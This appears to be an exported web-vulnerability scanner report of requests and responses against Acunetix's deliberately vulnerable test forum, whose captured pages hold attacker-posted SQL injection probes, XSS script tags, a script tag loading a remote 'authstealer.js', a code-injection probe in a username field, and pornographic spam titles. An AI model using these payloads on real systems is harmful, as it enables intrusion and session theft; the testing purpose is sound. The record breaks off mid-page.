Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=28'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=29'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=30'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:13:43 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=31'>Hot galleries, daily updated collections</a></div></td><td>1</td><td>victoriadi1</td><td>3/13/2022 10:23:53 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=32'>Big Ass Photos - Free Huge Butt Porn, Big Booty Pics</a></div></td><td>1</td><td>susanac1</td><td>3/13/2022 12:03:13 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=33'>Best Nude Playmates & Centerfolds, Beautiful galleries daily updates</a></div></td><td>1</td><td>kristiela3</td><td>3/13/2022 3:28:51 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=34'>New hot project galleries, daily updates</a></div></td><td>1</td><td>friedajd1</td><td>3/13/2022 9:02:56 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=35'>Free Porn Pictures and Best HD Sex Photos</a></div></td><td>1</td><td>dianezg60</td><td>3/13/2022 11:25:30 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=36'>test</a></div></td><td>1</td><td>hanxuan</td><td>3/14/2022 1:14:17 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=37'>Hot photo galleries blogs and pictures</a></div></td><td>1</td><td>sethpq11</td><td>3/14/2022 2:11:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=38'>Mr.</a></div></td><td>1</td><td>${@print(md5(31337))}\</td><td>3/14/2022 4:18:48 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=39'>Shemale Sexy Galleries</a></div></td><td>1</td><td>ineshy11</td><td>3/14/2022 6:42:20 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=40'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn</a></div></td><td>1</td><td>myrnaou3</td><td>3/14/2022 7:22:30 AM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showforum.asp?id=1 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 316 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 3101 |
| Response Body - size: 3,101 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Weather</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Weather </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>301 Moved Permanently</a></div></td><td>1</td><td>WinstonVup</td><td>3/14/2022 5:30:18 AM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showforum.asp?id=2 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 316 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 4017 |
| Response Body - size: 4,017 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Miscellaneous</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Miscellaneous </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>ÑайÑ</a></div></td><td>1</td><td>Jamesaidem</td><td>3/13/2022 10:17:25 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>Testing</a></div></td><td>1</td><td> </td><td>3/13/2022 3:11:02 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'><script>doSomethingEvil();</script></a></div></td><td>1</td><td> </td><td>3/13/2022 3:31:45 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'><script src=http://hackersite.com/authstealer.js> </script>.</a></div></td><td>1</td><td> </td><td>3/13/2022 3:33:39 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'><script>alert('Hello')</script></a></div></td><td>1</td><td> </td><td>3/13/2022 3:34:05 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=5'><script>alert('BELLO')</script></a></div></td><td>1</td><td> </td><td>3/13/2022 3:34:42 PM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=0 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 14602 |
| Response Body - size: 14,602 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>) UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>') UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>") UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> ASC -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:44 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>o3lppoLN</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:05:24 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Call me maybe<script>alert('Beautiful in white)</script> - 202.187.185.168</div><div class='posttext'>HI Maybe<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:06:11 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Call me maybe<script>alert('Beautiful in white')</script> - 202.187.185.168</div><div class='posttext'>HI Maybe<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:51:58 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 <script>alert('Hello')</script> - 180.75.245.68</div><div class='posttext'>HELLO<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>hanxuan</b> on 3/13/2022 2:43:15 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>hi - 180.75.236.90</div><div class='posttext'>http://example.com/han.js<br />document.write("I'm coming");</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=1 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 5979 |
| Response Body - size: 5,979 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:12:27 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script><br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by 